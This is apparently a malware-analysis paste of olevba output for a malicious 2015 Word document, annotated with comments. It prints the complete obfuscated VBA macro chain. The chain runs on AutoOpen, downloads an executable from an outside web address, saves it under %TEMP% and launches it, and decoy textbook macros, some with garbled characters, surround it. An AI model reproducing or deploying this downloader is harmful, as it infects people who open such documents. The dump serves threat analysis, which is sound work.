dynamoo

Malicious Word macro

Jun 15th, 2015
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS-HB- 291722~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 291722~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: 291722~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub A121212121212(FFFFF As Long)  ' Stage 1 of the AutoOpen chain. The FFFFF argument is never read; the only job is to hand off to the Module3 downloader.
  17.  ' Kept as a separate hop so the auto-exec routine itself contains no suspicious keyword.
  18. knGjLBTgmGgBh  ' Module3.knGjLBTgmGgBh: fetches the payload over HTTP, writes it under %TEMP%, then launches it from an error handler.
  19.  
  20. End Sub
  21.  
  22. Sub autoopen()  ' AutoOpen entry point (the AutoExec row in ANALYSIS): runs as soon as the document is opened with macros enabled, with no further user interaction.
  23.  ' The literal 3 is passed but ignored by the callee.
  24. A121212121212 (3)
  25.  
  26. End Sub
  27.  
  28.  
  29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  30. ANALYSIS:
  31. +------------+-------------+-----------------------------------------+
  32. | Type       | Keyword     | Description                             |
  33. +------------+-------------+-----------------------------------------+
  34. | AutoExec   | AutoOpen    | Runs when the Word document is opened   |
  35. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  36. |            |             | be used to obfuscate strings (option    |
  37. |            |             | --decode to see all)                    |
  38. +------------+-------------+-----------------------------------------+
  39. -------------------------------------------------------------------------------
  40. VBA MACRO Module1.bas
  41. in file: 291722~1.doc - OLE stream: u'Macros/VBA/Module1'
  42. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  43.  
  44. Dim currCell As String  ' The module-level variable for Listing 7.4 (textbook filler; not referenced by any module extracted on this page)
  45.  
  46. ' Listing 7.1. Toggles the active window's gridlines on and off.
  47. '
  48. Sub ToggleGridlines()  ' Decoy: textbook filler ("Listing 7.1"), not reachable from the AutoOpen chain shown on this page. NOTE(review): the non-ASCII characters below look like extraction/paste artifacts rather than source — confirm against the raw OLE stream.
  49.  
  50.     With ActiveWindow
  51.        ù.DisplayGridLines = Not à.DisplayGridLines
  52.     End With
  53.    
  54. End Sub
  55.  
  56. ' Listing 7.2. A procedure that tests the Evaluate function.
  57. '
  58. Sub EvaluateTest()  ' Decoy: textbook filler ("Listing 7.2") using the Excel object model (Worksheets, Evaluate) inside a Word document; not reachable from the AutoOpen chain. NOTE(review): the non-ASCII characters below look like extraction/paste artifacts — confirm against the raw OLE stream.
  59.     Dim columnLetter As String
  60.     Dim rowNumber As String
  61.     Dim cellAddress As String
  62.     '
  63.    ' Activate the "Test Data" worksheet
  64.    '
  65.    þ.Worksheets("Test Data").Activate
  66.     '
  67.    ' Get the value in cell A1
  68.    '
  69.    columnLetter = è.[A1].Value
  70.     '
  71.    ' Get the value in cell B1
  72.    '
  73.    rowNumber = è.[B1].Value
  74.     '
  75.    ' Concatenate the two values and then display the message
  76.    '
  77.    cellAddress = columnLetter & rowNumber
  78.     MsgBox "The value in cell " & cellAddress & " is " & ð.Evaluate(cellAddress)
  79. End Sub
  80.  
  81.  
  82. Public Function E1hULdfCYKq40(M72YMyUcUWEAf As String)  ' Final stage: launches the dropped file. The string argument is never used; called only from the error handler in Module3.knGjLBTgmGgBh.
  83.  Set Z0EcDOINA = fAQaVGJfCYUL("S" & "h" & Chr(101) & Chr(108) & Chr(108) & "." & "A" & "p" & Chr(112) & Chr(108) & "i" & Chr(99) & Chr(97) & Chr(116) & Chr(105) & "o" & "n")  ' Chr()-spliced ProgID decodes to "Shell.Application"
  84. Z0EcDOINA.Open (AHmYANL3)  ' Shell.Application.Open on the global drop path set by Module3 (%TEMP%\ginkan86.exe once decoded): this executes the downloaded binary.
  85. End Function
  86. Public Function fAQaVGJfCYUL(U9ZWOpJrq As String)  ' Late-binding helper: wraps CreateObject so every ProgID can be assembled with Chr() at the call site (the Chr row in ANALYSIS).
  87.  Set fAQaVGJfCYUL = CreateObject(U9ZWOpJrq)  ' Returns the COM object for the ProgID. Used for Shell.Application, Microsoft.XMLHTTP, WScript.Shell and Adodb.Stream elsewhere in this sample.
  88. End Function
  89. Function CalcNetMargin(fixedCosts)  ' Decoy: textbook filler using the Excel object model; not reachable from the AutoOpen chain. NOTE(review): the non-ASCII characters below look like extraction/paste artifacts — confirm against the raw OLE stream.
  90.  
  91.     Dim totalSales
  92.     Dim totalExpenses
  93.    
  94.     With ï.Worksheets("2000 Budget")
  95.         totalSales = ï.Application.Sum(.Range("Sales"))
  96.         totalExpenses = ï.Application.Sum(.Range("Expenses"))
  97.     End With
  98.        
  99.     If totalSales <> 0 Then
  100.         CalcNetMargin = (totalSales - totalExpenses - fixedCosts) / totalSales
  101.     End If
  102.     '
  103.    ' Recalculate whenever the sheet recalculates
  104.    '
  105.    â.Application.Volatile
  106. End Function
  107.  
  108. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  109. ANALYSIS:
  110. +------------+----------------+-----------------------------------------+
  111. | Type       | Keyword        | Description                             |
  112. +------------+----------------+-----------------------------------------+
  113. | Suspicious | Open           | May open a file                         |
  114. | Suspicious | Chr            | May attempt to obfuscate specific       |
  115. |            |                | strings                                 |
  116. | Suspicious | CreateObject   | May create an OLE object                |
  117. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  118. |            |                | may be used to obfuscate strings        |
  119. |            |                | (option --decode to see all)            |
  120. +------------+----------------+-----------------------------------------+
  121. -------------------------------------------------------------------------------
  122. VBA MACRO Module5.bas
  123. in file: 291722~1.doc - OLE stream: u'Macros/VBA/Module5'
  124. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  125.  
  126. Public AHmYANL3 As String
  127. ' Global variable: full path of the dropped payload. Written by Module3.knGjLBTgmGgBh (%TEMP%\ginkan86.exe once decoded) and read by Module1.E1hULdfCYKq40, which hands it to Shell.Application.Open.
  128.  
  129. ' Listing 8.1. This procedure ties everything together by
  130. ' calling each of the code listings individually.
  131. '
  132. Sub Main()  ' Decoy: textbook filler ("Listing 8.1") for the PowerPoint object model; nothing on this page calls Main, so it is not part of the AutoOpen chain.
  133.     '
  134.    ' Create the presentation file
  135.    '
  136.    CreateJugglingPresentation
  137.     '
  138.    ' Add the slides
  139.    '
  140.    AddJugglingSlides
  141.     '
  142.    ' Set up the title page
  143.    '
  144.    SetUpStartPage
  145.     '
  146.    ' Set up the Juggling pages
  147.    '
  148.    '
  149.    ' Save it and then run it (pres is assigned in CreateJugglingPresentation)
  150.    '
  151.    pres.Save
  152.    
  153. End Sub
  154.  
  155. ' Listing 8.2. This procedure creates a new presentation
  156. ' and then saves it.
  157. '
  158. Sub CreateJugglingPresentation()  ' Decoy: textbook filler ("Listing 8.2"); only called from the unused Main above.
  159.    '
  160.    ' If the old one is still open, close it without saving
  161.    '
  162.    For Each p In Presentations
  163.         If p.Name = "Juggling" Then
  164.             p.Saved = True
  165.             p.Close
  166.         End If
  167.     Next p
  168.     '
  169.    ' Create a new Presentation object and store it in pres (module-level, never declared with Dim)
  170.    '
  171.    Set pres = Presentations.Add
  172.     pres.SaveAs FileName:="Juggling.ppt"
  173. End Sub
  174.  
  175. ' Listing 8.3. A procedure that adds the slides to the
  176. ' Juggling presentation and formats them.
  177. '
  178. Sub AddJugglingSlides()  ' Decoy: textbook filler ("Listing 8.3"); only called from the unused Main above.
  179.     Dim i As Integer
  180.    
  181.     With pres
  182.         With .Slides
  183.          '
  184.         ' Add the opening slide
  185.         '
  186.         .Add(Index:=1, Layout:=ppLayoutTitle).Name = "Opener"
  187.          '
  188.         ' Now add the slides for each step
  189.         '
  190.         For i = 1 To 4
  191.              .Add(Index:=i + 1, Layout:=ppLayoutTitle).Name = "Juggling" & i
  192.          Next i
  193.     End With
  194.     '
  195.    ' Set the background for all the slides
  196.    '
  197.    .SlideMaster.Background.Fill.PresetGradient _
  198.         Style:=msoGradientHorizontal, _
  199.         Variant:=1, _
  200.         PresetGradientType:=msoGradientNightfall
  201.     End With
  202. End Sub
  203.  
  204. ' Listing 8.4. A procedure that sets up the text and animation
  205. ' settings for the first page of the Juggling presentation.
  206. '
  207. Sub SetUpStartPage()  ' Decoy: textbook filler ("Listing 8.4"); only called from the unused Main above. NOTE(review): the non-ASCII characters below look like extraction/paste artifacts — confirm against the raw OLE stream.
  208.     Dim shapeTitle As Shape
  209.     Dim shapeSubTitle As Shape
  210.    
  211.     With pres.Slides("Opener")
  212.         Set shapeTitle = .Shapes(1)     ' The title
  213.        Set shapeSubTitle = .Shapes(2)  ' The subtitle
  214.        '
  215.        ' Add the title text
  216.        '
  217.        With shapeTitle.TextFrame.TextRange
  218.             .Text = "Juggling"
  219.             With .Font
  220.                 .Name = "Arial"
  221.                 .Size = 44
  222.                 .Bold = True
  223.                 ð.Color.RGB = RGB(255, 255, 255)
  224.             End With
  225.         End With
  226.         '
  227.        ' Set the title animation
  228.        '
  229.        With ð.shapeTitle.AnimationSettings
  230.             .Animate = True
  231.             .AdvanceMode = ppAdvanceOnTime
  232.             .AdvanceTime = 0
  233.             .TextUnitEffect = ppAnimateByCharacter
  234.             .EntryEffect = ppEffectFlyFromLeft
  235.         End With
  236.         '
  237.        ' Add the subtitle text
  238.        '
  239.        With shapeSubTitle.TextFrame.TextRange
  240.             .Text = "A Step-By-Step Course"
  241.             With .Font
  242.                 .Name = "Arial"
  243.                 .Size = 36
  244.                 .Bold = True
  245.                 ð.Color.RGB = RGB(255, 255, 255)
  246.             End With
  247.         End With
  248.         '
  249.        ' Set the subtitle animation
  250.        '
  251.        With ð.shapeSubTitle.AnimationSettings
  252.             .Animate = True
  253.             .AdvanceMode = ppAdvanceOnTime
  254.             .AdvanceTime = 0
  255.             .TextUnitEffect = ppAnimateByWord
  256.             .EntryEffect = ppEffectFlyFromBottom
  257.         End With
  258.     End With
  259. End Sub
  260. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  261. ANALYSIS:
  262. +------------+----------------+-----------------------------------------+
  263. | Type       | Keyword        | Description                             |
  264. +------------+----------------+-----------------------------------------+
  265. | Suspicious | Open           | May open a file                         |
  266. | Suspicious | Run            | May run an executable file or a system  |
  267. |            |                | command                                 |
  268. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  269. |            |                | may be used to obfuscate strings        |
  270. |            |                | (option --decode to see all)            |
  271. +------------+----------------+-----------------------------------------+
  272. -------------------------------------------------------------------------------
  273. VBA MACRO Module3.bas
  274. in file: 291722~1.doc - OLE stream: u'Macros/VBA/Module3'
  275. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  276.  
  277. ' Listing 6.1. A procedure that toggles the display of
  278. ' nonprinting characters on and off.
  279. '
  280. Sub ToggleNonprinting()  ' Decoy: textbook filler ("Listing 6.1"); not reachable from the AutoOpen chain shown on this page.
  281.  
  282.     With ActiveWindow.View
  283.         .ShowAll = Not .ShowAll
  284.     End With
  285.  
  286. End Sub
  287.  
  288.  
  289. ' Listing 6.3. A procedure that moves the Word window
  290. ' into the top left corner of the screen.
  291. '
  292. Sub TopLeftCorner()  ' Decoy: textbook filler ("Listing 6.3"); not reachable from the AutoOpen chain shown on this page.
  293.     With Application
  294.         If .WindowState <> wdWindowStateMaximize _
  295.             And .WindowState <> wdWindowStateMinimize _
  296.             Then .Move 0, 0
  297.     End With
  298. End Sub
  299.  
  300. ' Listing 6.4. Procedures that create and open
  301. ' a workspace of files.
  302. '
  303. ' CreateWorkspace()
  304. ' Saves the path and filename data of all the
  305. ' open files to the Windows Registry. Before
  306. ' running this procedure, make sure only the
  307. ' files you want in the workspace are open.
  308. '
  309. Sub CreateWorkspace()  ' Decoy: textbook filler ("Listing 6.4"); not reachable from the AutoOpen chain. If run by hand it would write under HKCU "VB and VBA Program Settings\Word\Workspace" via SaveSetting.
  310.     Dim total As Integer
  311.     Dim doc As Document
  312.     Dim i As Integer
  313.     '
  314.    ' Delete the old workspace settings
  315.    ' First, get the total number of files
  316.    '
  317.    total = GetSetting("Word", "Workspace", "TotalFiles", 0)
  318.     For i = 1 To total
  319.         '
  320.        ' Delete each setting
  321.        '
  322.        DeleteSetting "Word", "Workspace", "Document" & i
  323.     Next 'i
  324.    '
  325.    ' Create the new workspace
  326.    '
  327.    i = 0
  328.     For Each doc In Documents
  329.         '
  330.        ' Make sure it's not a new, unsaved file
  331.        '
  332.        If doc.Path <> "" Then
  333.             '
  334.            ' Use i to create unique setting names
  335.            '
  336.            i = i + 1
  337.             '
  338.            ' Save the FullName (path and filename) to the Registry
  339.            '
  340.            SaveSetting "Word", "Workspace", "Document" & i, doc.FullName
  341.         End If
  342.     Next 'doc
  343.    '
  344.    ' Save the total number of files
  345.    '
  346.    SaveSetting "Word", "Workspace", "TotalFiles", i
  347. End Sub
  348. Sub knGjLBTgmGgBh()  ' Stage 2 (called from ThisDocument.A121212121212): download the payload over HTTP, write it under %TEMP%, then run it from a deliberately triggered error handler.
  349.  ' Every ProgID, method name and string below is spliced from Chr() calls (the Chr / CallByName rows in ANALYSIS); decoded values are given in the comments.
  350. Set DhAXmemS278B6 = fAQaVGJfCYUL(Chr(77) & "i" & Chr(99) & Chr(114) & "o" & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(46) & Chr(88) & "M" & "L" & "H" & Chr(84) & Chr(84) & Chr(80))  ' decodes to "Microsoft.XMLHTTP"
  351.  ' Next statement decodes to CallByName(xmlhttp, "Open", "GET", hxxp://www[.]freewebstuff[.]be/34/44[.]exe, False). NOTE(review): the third argument is the string "GET" where CallByName expects a VbCallType — confirm in a sandbox whether this sample detonates as written.
  352. CallByName DhAXmemS278B6, "O" & Chr(112) & Chr(101) & Chr(110), Chr(71) & Chr(69) & Chr(84), _
  353. Chr(104) & Chr(116) & Chr(116) & "p" & Chr(58) & Chr(47) & Chr(47) & Chr(119) & Chr(119) & Chr(119) & Chr(46) & Chr(102) & "r" & "e" & Chr(101) & Chr(119) & Chr(101) & Chr(98) & Chr(115) & Chr(116) & Chr(117) & Chr(102) & Chr(102) & Chr(46) & Chr(98) & Chr(101) & Chr(47) & "3" & Chr(52) & Chr(47) & Chr(52) & "4" & Chr(46) & "e" & Chr(120) & Chr(101) _
  354. , False
  355.  
  356.  
  357. Set VZGc6njbPx6 = fAQaVGJfCYUL("W" & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108))  ' decodes to "WScript.Shell"
  358.  
  359. Set gsHD7abC5N3 = CallByName(VZGc6njbPx6, "E" & Chr(110) & Chr(118) & "i" & Chr(114) & Chr(111) & Chr(110) & "m" & Chr(101) & Chr(110) & Chr(116), VbGet, "P" & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & "s")  ' WScript.Shell.Environment("Process"): the process environment block
  360.  
  361. I2fThDFfJ2x = gsHD7abC5N3("T" & Chr(69) & Chr(77) & Chr(80))  ' reads %TEMP%
  362.  
  363. AHmYANL3 = I2fThDFfJ2x & Chr(92) & "g" & Chr(105) & Chr(110) & Chr(107) & Chr(97) & Chr(110) & Chr(56) & Chr(54) & Chr(46) & Chr(101) & Chr(120) & Chr(101)  ' global drop path: %TEMP%\ginkan86.exe (consumed by Module1.E1hULdfCYKq40)
  364. Dim L3eSO44R() As Byte
  365.  
  366. CallByName DhAXmemS278B6, "S" & "e" & Chr(110) & Chr(100), VbMethod  ' xmlhttp.Send: performs the GET
  367. L3eSO44R = CallByName(DhAXmemS278B6, "r" & Chr(101) & Chr(115) & Chr(112) & Chr(111) & Chr(110) & "s" & "e" & Chr(66) & "o" & "d" & Chr(121), VbGet)  ' xmlhttp.responseBody: raw bytes of the downloaded file
  368. aJbV7hKTsFzE L3eSO44R, AHmYANL3  ' write the bytes to the drop path through Adodb.Stream (Module3.aJbV7hKTsFzE)
  369. On Error GoTo GbzD0F5w  ' Control-flow obfuscation: the next line raises a runtime error on purpose so execution lands in the handler below.
  370.     a = 84 / 0  ' division by zero -> jumps to GbzD0F5w
  371.   On Error GoTo 0  ' not reached on the error path
  372.  
  373. YmVz6Pw29BQ:
  374.   Exit Sub
  375. GbzD0F5w:  ' the error handler is the execution stage
  376.   E1hULdfCYKq40 ("qXSh3tUIo")  ' Module1: Shell.Application.Open(AHmYANL3) launches the dropped executable; the string argument is ignored
  377. Resume YmVz6Pw29BQ  ' then exit cleanly so the document opens without a visible error
  378. End Sub
  379. Public Function aJbV7hKTsFzE(bB2ojLbgVtJ As Variant, sliQYqZdLGCmtq As String)  ' Dropper helper: writes the byte array bB2ojLbgVtJ to disk at path sliQYqZdLGCmtq. Called once from knGjLBTgmGgBh with the HTTP response body and the %TEMP% drop path.
  380. Dim BkUobg5a: Set BkUobg5a = fAQaVGJfCYUL(Chr(65) & "d" & Chr(111) & "d" & "b" & Chr(46) & Chr(83) & Chr(116) & "r" & Chr(101) & "a" & Chr(109))  ' decodes to "Adodb.Stream"
  381.  
  382. With BkUobg5a
  383.    .Type = 1  ' adTypeBinary: the stream carries raw bytes, not text
  384.     .Open
  385.     .write bB2ojLbgVtJ  ' copy the downloaded bytes into the stream
  386.     .savetofile sliQYqZdLGCmtq, 2  ' 2 = adSaveCreateOverWrite: creates or silently replaces the file (the SaveToFile / Write rows in ANALYSIS)
  387. End With
  388. End Function
  389.  
  390.  
  391.  
  392.  
  393. '
  394. ' OpenWorkspace()
  395. ' Accesses the Registry's workspace settings
  396. ' and then opens each workspace file.
  397. '
  398. Sub OpenWorkspace()  ' Decoy: textbook filler (companion to CreateWorkspace); not reachable from the AutoOpen chain shown on this page.
  399.     Dim total As Integer
  400.     Dim i As Integer
  401.     Dim filePath As String
  402.     Dim doc As Document
  403.     Dim fileAlreadyOpen As Boolean
  404.     '
  405.    ' Get the total number of files
  406.    '
  407.    total = GetSetting("Word", "Workspace", "TotalFiles", 0)
  408.     For i = 1 To total
  409.         '
  410.        ' Get the path and filename
  411.        '
  412.        filePath = GetSetting("Word", "Workspace", "Document" & i)
  413.         '
  414.        ' Make sure the file isn't already open
  415.        '
  416.        fileAlreadyOpen = False
  417.         For Each doc In Documents
  418.             If filePath = doc.FullName Then
  419.                 fileAlreadyOpen = True
  420.                 Exit For
  421.             End If
  422.         Next 'doc
  423.        '
  424.        ' Open it
  425.        '
  426.        If Not fileAlreadyOpen Then
  427.             Documents.Open filePath
  428.         End If
  429.     Next 'i
  430. End Sub
  431.  
  432. Sub TestStylesAddMethod()  ' Decoy: textbook filler that adds a paragraph style; not reachable from the AutoOpen chain shown on this page.
  433. Set newStyle = ActiveDocument.Styles.Add("PageTitle", wdStyleTypeParagraph)
  434. With newStyle
  435.     .Font.Bold = True
  436.     .Font.Underline = True
  437.     .Font.Size = 24
  438.     .Font.Name = "Arial"
  439.     .ParagraphFormat.Alignment = wdAlignParagraphCenter
  440.     .ParagraphFormat.SpaceAfter = 12
  441.     .NextParagraphStyle = wdStyleNormal
  442. End With
  443. End Sub
  444.  
  445.  
  446. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  447. ANALYSIS:
  448. +------------+----------------+-----------------------------------------+
  449. | Type       | Keyword        | Description                             |
  450. +------------+----------------+-----------------------------------------+
  451. | Suspicious | Open           | May open a file                         |
  452. | Suspicious | Windows        | May enumerate application windows (if   |
  453. |            |                | combined with Shell.Application object) |
  454. | Suspicious | Chr            | May attempt to obfuscate specific       |
  455. |            |                | strings                                 |
  456. | Suspicious | SaveToFile     | May create a text file                  |
  457. | Suspicious | CallByName     | May attempt to obfuscate malicious      |
  458. |            |                | function calls                          |
  459. | Suspicious | Write          | May write to a file (if combined with   |
  460. |            |                | Open)                                   |
  461. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  462. |            |                | may be used to obfuscate strings        |
  463. |            |                | (option --decode to see all)            |
  464. +------------+----------------+-----------------------------------------+